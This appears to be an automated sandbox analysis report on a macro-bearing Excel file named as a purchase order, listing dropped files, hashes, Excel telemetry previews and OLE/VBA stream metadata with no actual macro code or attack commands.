                Preview:3.7.4.6.3.7.8.,.3.7.4.6.3.7.6.,.1.0.7.,.6.3.6.4.3.3.4.,.1.1.9.6.3.7.8.,.2.5.5.0.5.0.8.8.,.1.0.1.,.1.0.4.9.5.2.3.4.,.1.1.9.,.7.0.0.9.9.8.4.,.1.1.9.6.2.9.3.,.1.2.4.,.1.9.8.4.4.3.5.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.8.,.6.5.4.2.1.8.5.1.,.1.2.5.,.6.3.6.4.3.3.2.,.1.2.8.,.1.0.0.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.3.0.0.4.9.2.6.8.,.1.2.1.,.1.2.2.,.5.4.5.6.5.4.3.,.1.2.3.,.1.2.6.,.1.2.2.3.4.3.4.,.4.5.8.4.0.2.3.2.,.2.6.0.1.,.8.7.4.7.0.1.5.3.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.9.,.6.1.7.0.7.3.0.5.,.3.,.3.0.1.5.3.7.2.1.,.4.0.6.9.3.5.8.2.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.2.7.3.6.0.0.9.5.,.2.6.4.8.5.7.8.4.,.6.1.7.0.7.3.0.7.,.3.3.7.9.1.6.2.,.3.2.9.4.5.8.7.9.9.,.2.4.6.0.9.2.5.8.,.1.3.5.2.5.8.6.,.5.7.9.9.9.6.6.1.,.4.8.1.9.5.5.3.8.,.7.4.5.3.4.5.9.,.2.7.1.5.3.4.9.7.,.3.7.4.6.3.7.9.,.6.3.7.1.6.9.4.,.1.3.,.3.0.1.2.3.4.6.6.,.3.4.1.4.8.5.6.8.,.6.5.4.0.2.1.5.,.5.8.4.2.5.8.6.0.,.6.3.0.6.3.0.9.9.,.4.,.5.9.2.2.3.4.3.7.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.2.,.1.
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):20971520
                Entropy (8bit):8.112143835430977E-5
                Encrypted:false
                SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                MD5:AFDEAC461EEC32D754D8E6017E845D21
                SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):20971520
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):71
                Entropy (8bit):4.3462513114457515
                Encrypted:false
                SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                MD5:8F4510F128F81A8BAF2A345D00F7E30C
                SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                Malicious:false
                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:ASCII text, with very long lines (28590), with CRLF line terminators
                Category:dropped
                Size (bytes):20971520
                Entropy (8bit):0.1971852672077856
                Encrypted:false
                SSDEEP:1536:c6MoxUT5zuvNQVLmCaVIjydJPsuxVVi9SRkT2e5tLTSdKRx8eUtjxfsQjAz50Ihf:soo0QVbaVl7xOy8ovu9CBYw
                MD5:44C15495B6D18CEA71BDB3C9EA688FE3
                SHA1:FAFDAA4F081D6B13E478E74409668232AE92AA6E
                SHA-256:155E1B5CA86A05E038B9ABE8F6AF3A015DBE4006E2B63E310A814571CF13EB04
                SHA-512:BAE5A088B37CCE6AE7331503BD7AFDB3BB515B935A8E28CE00822D5AF0DE538CC8F100BBCF55C82926394BC73F2E98A207AC2C714C7EDB929A63890E4B386813
                Malicious:false
                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..01/08/2025 08:49:02.662.EXCEL (0x1B88).0x1B30.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":16,"Time":"2025-01-08T08:49:02.662Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-08T08:49:02.3659388Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-08T08:49:02.3659388Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-08T08:49:02.3659388Z\", \"C\" : \"\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):20971520
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:ASCII text, with very long lines (28630), with CRLF line terminators
                Category:dropped
                Size (bytes):320463
                Entropy (8bit):5.100162441296978
                Encrypted:false
                SSDEEP:1536:CFB/+zDMM3ySy07If5lZ/TKTMT698BoizjHHLUk9q0Tt3bAObVt5v3qxJP8ia9OV:a/PSyvf5bbSeY4F9CBYwqU
                MD5:69B311CA087C5CC28871C738C094BCBE
                SHA1:7AF64CF25B2C10723DC4A773CE8111FCB8F658BC
                SHA-256:9C178195EA31526B10303CAD343B4B34F50FFF675358B398F3D2FE163DCBB480
                SHA-512:A971FA0212ACAB50744DEEF356E6CCBC7383E2406A1D48FE29AF5B622A24D07C662BBF1BDC692691637253FFCE3AF8E7F0A9975D81DB83536A1EC9E248660F4F
                Malicious:false
                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..01/08/2025 08:50:22.341.EXCEL (0x1AF8).0x1E30.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2025-01-08T08:50:22.341Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-08T08:50:22.1541119Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-08T08:50:22.1541119Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-08T08:50:22.1541119Z\", \"C\" : \"\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):73728
                Entropy (8bit):4.743912998911936
                Encrypted:false
                SSDEEP:1536:kCCCBHqbrrgk3hbdlylKsgwyzcTbWhZFGkE+cugL80dD/QVUgzVtOam:3qbrrgk3hbdlylKsgwyzcTbWhZFGkE+S
                MD5:2B0E2D265AD4B2211984D3C506162360
                SHA1:920B64CABAACFB1D644EB69651415143A8ECE8E2
                SHA-256:7350DB7BFD2BDCD204CF86F7F009EA53A59C6D9E2BBBA265F18BE69DA0C4B7BC
                SHA-512:F02250EAF43EA6965B069A66FF84F8810738F540701A6B3261BF55F1099A9615930300DDE96035C83D6C1C9F27D05A95B1D2BD6FEE0F4686C3D91A3D8D3A1923
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jan 8 08:50:20 2025, Security: 1
                Category:dropped
                Size (bytes):147968
                Entropy (8bit):7.093858486082799
                Encrypted:false
                SSDEEP:3072:Vqbrrgk3hbdlylKsgwyzcTbWhZFGkE+cugL80dD/QnzPOamJ3GJUELrfc368VEvF:Lk3hbdlylKsgwyzcTbWhZFVE+fgL80du
                MD5:75C3D387F13D0E65B8179DBACFF6BAC8
                SHA1:5DCE67D5DB6A646B571A04CAF42DAD16EFA231D1
                SHA-256:604D26ECC6C0A3129BCF3A8D8A21D8D777B00242F1C23BA81AD6F2D5163ADBD4
                SHA-512:FED6EB2777CA5EEC64DF20018F67307238FA7E9D694DAA54809585676F720433779D23B2936D1238C66D92C8B2B60F0508271BF4C5EDBDBC5E6E9ED882A59127
                Malicious:false
                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:false
                Preview:[ZoneTransfer]....ZoneId=0
                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jan 8 08:50:20 2025, Security: 1
                Category:dropped
                Size (bytes):147968
                Entropy (8bit):7.093858486082799
                Encrypted:false
                SSDEEP:3072:Vqbrrgk3hbdlylKsgwyzcTbWhZFGkE+cugL80dD/QnzPOamJ3GJUELrfc368VEvF:Lk3hbdlylKsgwyzcTbWhZFVE+fgL80du
                MD5:75C3D387F13D0E65B8179DBACFF6BAC8
                SHA1:5DCE67D5DB6A646B571A04CAF42DAD16EFA231D1
                SHA-256:604D26ECC6C0A3129BCF3A8D8A21D8D777B00242F1C23BA81AD6F2D5163ADBD4
                SHA-512:FED6EB2777CA5EEC64DF20018F67307238FA7E9D694DAA54809585676F720433779D23B2936D1238C66D92C8B2B60F0508271BF4C5EDBDBC5E6E9ED882A59127
                Malicious:true
                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 7 16:27:46 2025, Security: 1
                Entropy (8bit):7.529109477538208
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:PO#3311-20250108003.xls
                File size:231'936 bytes
                MD5:6a899fecf09eb7899fd6a521aba5eb5e
                SHA1:2f514a32ca1990347a42c4f3934afcab5a341530
                SHA256:519cda9511738dfa6ad57a5716bd217d9c44af7023907711ddc76c4511f24d60
                SHA512:7fd1002024b5ca418fb574274e4cf48492152218203bc36cced26f1611a9592eea8c1d79e3808172d77a2dc4d2773c075660a60f21711f2519045b754ce3154a
                SSDEEP:6144:UZ+RwPONXoRjDhIcp0fDlavx+fgLt0d6IOXqgVIvn2iBU2ny0T+/Lvz:f7gVIvn3GeyTv
                TLSH:F634F151F6C7C84AE90647364AF796E77322FC415F938B0B3298B70E6AB45C0A527723
                File Content Preview:........................>...............................................................w......................................................................................................................................................................
                Icon Hash:35ed8e920e8c81b5
                Document Type:OLE
                Number of OLE Files:1
                Has Summary Info:
                Application Name:Microsoft Excel
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:True
                Code Page:1252
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2025-01-07 16:27:46
                Creating Application:Microsoft Excel
                Security:1
                Document Code Page:1252
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:786432
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 ; . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 35 91 3b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet1"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                VBA File Name:Sheet2.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 N . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 35 4e cb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet2"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                VBA File Name:Sheet3.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 L . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 35 4c ec 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "Sheet3"
                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook.cls
                Stream Size:985
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 ) . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 90 35 87 29 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Attribute VB_Name = "ThisWorkbook"
                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = True
                

                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:244
                Entropy:2.889430592781307
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                General
                Stream Path:\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:200
                Entropy:3.2603503175049817
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . ~ . ! a . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                General
                Stream Path:MBD01010D3D/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                General
                Stream Path:MBD01010D3D/\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:708
                Entropy:3.6235698530352805
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                General
                Stream Path:MBD01010D3D/\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:372
                Entropy:2.9133459114787295
                Base64 Encoded:True
